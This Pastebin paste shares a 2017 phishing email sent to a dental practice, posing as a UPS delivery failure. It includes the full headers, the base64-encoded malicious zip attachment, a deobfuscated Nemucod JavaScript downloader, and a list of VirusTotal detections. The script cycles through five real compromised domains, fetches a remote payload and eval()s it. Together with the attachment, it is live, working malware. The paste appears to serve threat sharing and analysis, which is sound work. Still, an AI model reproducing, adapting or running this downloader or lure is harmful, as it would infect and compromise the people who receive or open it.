API tools faq
paste
Advertisement
Guest User

hay

a guest
Mar 6th, 2017
503
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.41 KB | None | 0 0
raw download clone embed print report
  1. Received: from exim by mail3.eqx.gridhost.co.uk with spam-scanned (Exim 4.63)
  2. (envelope-from <presta@www.e-conrad.iq.pl>)
  3. id 1cjhM2-0008LB-OV
  4. for info@haymarketdental.com; Fri, 03 Mar 2017 07:10:23 +0000
  5. X-Spam-Checker-Version: SpamAssassin 3.3.1 (2010-03-16) on
  6. spam-10-168-100-9.eqx.gridhost.co.uk
  7. X-Spam-Level: **
  8. X-Spam-Status: No, score=2.7 required=4.0 tests=BAYES_50,RCVD_IN_BRBL_LASTEXT,
  9. RDNS_NONE autolearn=no version=3.3.1
  10. X-Spam-RelaysUntrusted: [ ip=46.248.165.161 rdns= helo=www.e-conrad.iq.pl
  11. by=mail3.eqx.gridhost.co.uk ident= envfrom=presta@www.e-conrad.iq.pl intl=0
  12. id=1cjhM2-0008Jw-MY auth= msa=0 ]
  13. Received: from [46.248.165.161] (helo=www.e-conrad.iq.pl)
  14. by mail3.eqx.gridhost.co.uk with esmtps (TLSv1:AES256-SHA:256)
  15. (Exim 4.63)
  16. (envelope-from <presta@www.e-conrad.iq.pl>)
  17. id 1cjhM2-0008Jw-MY
  18. for info@haymarketdental.com; Fri, 03 Mar 2017 07:10:18 +0000
  19. Received: from presta by www.e-conrad.iq.pl with local (Exim 4.80.1)
  20. (envelope-from <presta@www.e-conrad.iq.pl>)
  21. id 1cjhM1-0006mu-Mc
  22. for info@haymarketdental.com; Fri, 03 Mar 2017 08:10:17 +0100
  23. To: info@haymarketdental.com
  24. Subject: We have delivery problems with your parcel #004264707
  25. X-PHP-Originating-Script: 1008:post.php(3) : regexp code(1) : eval()'d code(17) : eval()'d code
  26. Date: Fri, 3 Mar 2017 08:10:17 +0100
  27. Content-Type: multipart/mixed;
  28. boundary="bound1_9f49d9393cb5a33697a5f25c631fad12"
  29. Content-Transfer-Encoding: 8bit
  30. Message-Id: <E1cjhM1-0006mu-Mc@www.e-conrad.iq.pl>
  31. From: presta@www.e-conrad.iq.pl
  32.  
  33. --bound1_9f49d9393cb5a33697a5f25c631fad12
  34. Content-Type: text/plain; charset=us-ascii
  35.  
  36. Dear Customer,
  37.  
  38. Your item has arrived at the UPS Post Office at March 01, but the courier was unable to deliver parcel to you.
  39.  
  40. Please review delivery label in attachment!
  41.  
  42. Most sincerely,
  43. Keith Levy,
  44. UPS Delivery Agent.
  45.  
  46.  
  47. --bound1_9f49d9393cb5a33697a5f25c631fad12
  48. Content-Type: application/zip; name="UPS-Delivery-004264707.zip"
  49. Content-Transfer-Encoding: base64
  50. Content-Disposition: attachment; filename=UPS-Delivery-004264707.zip
  51.  
  52. UEsDBBQAAAAIAEhBY0rkUACwqgIAAM4CAAAeAAAAVVBTLURlbGl2ZXJ5LTAwNDI2NDcwNy5kb2Mu
  53. emlwC/BmZhFhYGDgYPBwTPa6nGWx34iJgSGTmYFBFigaGhCs65Kak1mWWlSpa2BgYmRmYm5grpeS
  54. n6yXVRwaHJs/20CkNu3Sv+an7WIuzpO3eE9LvXtl/dbZYlvn3phl2qvWHsO00nBlLkfm1P/7soOt
  55. fB8lFZ9/WFBS28Et+NJEXIU59MWdryc2f/7WK/x80g7VySq2WfyevzZyWXS0+hW8/y0npHPasOfT
  56. m+gypz6PP4ueVJ1nK1J54cSllODbJ6iRWGMa7bTkrut1aalj19aGKzNpJLRuSK6Kyjvz6c2N8xFd
  57. KVmmwmtW96l92feqduE/rbdnj16+0mVhUKnqw7a28f48v9gqx9qu65ZhHt877FTsFsqvWO94a5Xa
  58. yyt5GS1TZFYfEIq4cee/z98c/bSYxu+feh0aZ0Tf/p+zsJhDZUWonkhLwEs23+RHp6bvnOifYiDx
  59. Q3bTZueUCV2WIeEbZ1feyC+18V6/vC25+or09/qjDmsrVk2U0/kcsmN3zvXqrw/OqGxov3V/27zV
  60. O1193Du5w25pRZ+5s+2Z6+Oai66vS5as6ilv/vjid6pE3OXE3lQ2rvzrz9+/98sTstM4Zm/tqd9z
  61. 42nkRXvLf8Fhe58Y5H3lf3Ldzy5t9e77Tx3XV8jE2sduOX7S947V2l/7f9w96LHlWuISuXX51fbH
  62. tk9f7LbfqXY2j+bNY0u9E5wa0qTnnf4Zwxo472HhxdJJxQE9zpOyH6zyMN2TZKMfvLHjY2vJuQop
  63. Z2Ydyw0S/KfeGJbOjlwYxOjFmqr2yXTTipmxk8OCzlvP05dwm+9wsuKvgcrtW1ptbOkTM/Zmnbm+
  64. 0/ju71X3j+nsO2yVH+DT1/htpe3CZ9ul/rEGeDMCExfu5AYBClAab+IL8GZlAyliBEJvIJ3LBOIB
  65. AFBLAQIAABQAAAAIAEhBY0rkUACwqgIAAM4CAAAeAAAAAAAAAAAAIAAAAAAAAABVUFMtRGVsaXZl
  66. cnktMDA0MjY0NzA3LmRvYy56aXBQSwUGAAAAAAEAAQBMAAAA5gIAAAAA
  67.  
  68.  
  69. --bound1_9f49d9393cb5a33697a5f25c631fad12--
  70.  
  71.  
  72.  
  73. function mesuto() {
  74. for (var i=0; i<x.length; i++)
  75. {
  76. var vDJmB = function(){
  77. return new ActiveXObject(g2);
  78. }();
  79. var e = vDJmB;
  80.  
  81. try
  82. {
  83. var raspbna2s=["\x6F"+pi6dnz];
  84. e[raspbna2s[9-9+0]]("G"+""+"E"+"T", t4 + ":"+ter+ter+x[i]+ter+"c"+"o"+"u"+"n"+"ter/?"+m,false);
  85. e.send();
  86.  
  87. var r = e.responseText;
  88.  
  89. if (r.length > 999+1 && r.indexOf(m) > -1)
  90. {
  91. reqty(e.responseText.split(m).join('a'));
  92.  
  93. break;
  94. };
  95. }
  96. catch(e)
  97. {
  98. };
  99. };
  100. }
  101.  
  102. var g2 = "Msxml2.XMLHTTP";
  103. var m = "TWwE8ZBQhl9uXU1h6TcaHDu7BA_vx6h4f-73rI1oXapZYv36uqMPzG0XhQf-Cx7VlZ3Mn-wTcskPW6RXWHM";
  104. var x = new Array("jeannetaylordds.com", "wholesalehotelsuites.com", "lovingfloridalife.com", "jleaf.se", "iveybusiness.vmnow.co");
  105. function reqty(fdga) { eval(fdga); }
  106. var t4 = "http";
  107. var pi6dnz = "\x70\x65\x6E";
  108. var ter = "/";
  109.  
  110. mesuto();
  111.  
  112.  
  113.  
  114. https://www.virustotal.com/en/file/ff92c175370564f97f81c6265882bdbccd5134af1890bc03181700d4a1661b10/analysis/1488824666/
  115.  
  116.  
  117.  
  118. File identification
  119. MD5 ec699c50bd7aefcdd86cbd955f001985
  120. SHA1 5dc9fcd6b739835f226018b506d0647a93d83482
  121. SHA256 ff92c175370564f97f81c6265882bdbccd5134af1890bc03181700d4a1661b10
  122. ssdeep
  123. File size 840 bytes ( 840 bytes )
  124. File type unknown
  125. Magic literal
  126. TrID
  127. VirusTotal metadata
  128. First submission 2017-03-06 18:24:26 UTC ( 0 minutes ago )
  129. Last submission 2017-03-06 18:24:26 UTC ( 0 minutes ago )
  130. File names UPS-Delivery-004264707.zip
  131.  
  132.  
  133.  
  134.  
  135. Contained files
  136. This file is a compressed stream containing 1 file.
  137. [+] UPS-Delivery-004264707.doc.zip ZIP 718 Bytes
  138. Compression metadata
  139. Contained files1
  140. Uncompressed size718
  141. Highest datetime2017-03-03 08:10:16
  142. Lowest datetime2017-03-03 08:10:16
  143. Contained files by extension
  144. zip1
  145. Contained files by type
  146. ZIP1
  147. ExifTool file metadata
  148. MIMETypeapplication/zip
  149. ZipRequiredVersion20
  150. ZipCRC0xb00050e4
  151. FileTypeZIP
  152. ZipCompressionDeflated
  153. ZipUncompressedSize718
  154. ZipCompressedSize682
  155. FileTypeExtensionzip
  156. ZipFileNameUPS-Delivery-004264707.doc.zip
  157. ZipBitFlag0
  158. ZipModifyDate2017:03:03 08:10:08
  159.  
  160.  
  161.  
  162. Microsoft TrojanDownloader:JS/Nemucod.ZZZ 20170306
  163. NANO-Antivirus Trojan.Script.Nemucod.embvil 20170306
  164. Kaspersky Trojan-Downloader.JS.Agent.nrs 20170306
  165. ZoneAlarm by Check Point Trojan-Downloader.JS.Agent.nrs 20170306
  166. K7AntiVirus Trojan ( 004dfe6d1 ) 20170306
  167. K7GW Trojan ( 004dfe6d1 ) 20170306
  168. TrendMicro TROJ_NEMUZIP.SMA1 20170306
  169. TrendMicro-HouseCall TROJ_NEMUZIP.SMA1 20170306
  170. Sophos Mal/DrodZp-A 20170306
  171. Emsisoft JS:Trojan.JS.Agent.PLM (B) 20170306
  172. ALYac JS:Trojan.JS.Agent.PLM 20170306
  173. Ad-Aware JS:Trojan.JS.Agent.PLM 20170306
  174. Arcabit JS:Trojan.JS.Agent.PLM 20170306
  175. BitDefender JS:Trojan.JS.Agent.PLM 20170306
  176. F-Secure JS:Trojan.JS.Agent.PLM 20170306
  177. GData JS:Trojan.JS.Agent.PLM 20170306
  178. eScan JS:Trojan.JS.Agent.PLM 20170306
  179. ESET-NOD32 JS/TrojanDownloader.Nemucod.CKJ 20170306
  180. McAfee JS/Nemucod.rj 20170306
  181. McAfee-GW-Edition JS/Nemucod.rj 20170306
  182. Fortinet JS/Nemucod.CKJ!tr.dldr 20170306
  183. AVG JS/Downloader.Agent.70_S 20170306
  184. Cyren JS/Downldr.HX1!Eldorado 20170306
  185. F-Prot JS/Downldr.HX1!Eldorado 20170306
  186. Baidu JS.Trojan-Downloader.Nemucod.ud 20170306
  187. CAT-QuickHeal JS.Nemucod.CIS 20170306
  188. DrWeb JS.DownLoader.1225 20170306
  189. Comodo Heur.Dual.Extensions 20170306
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!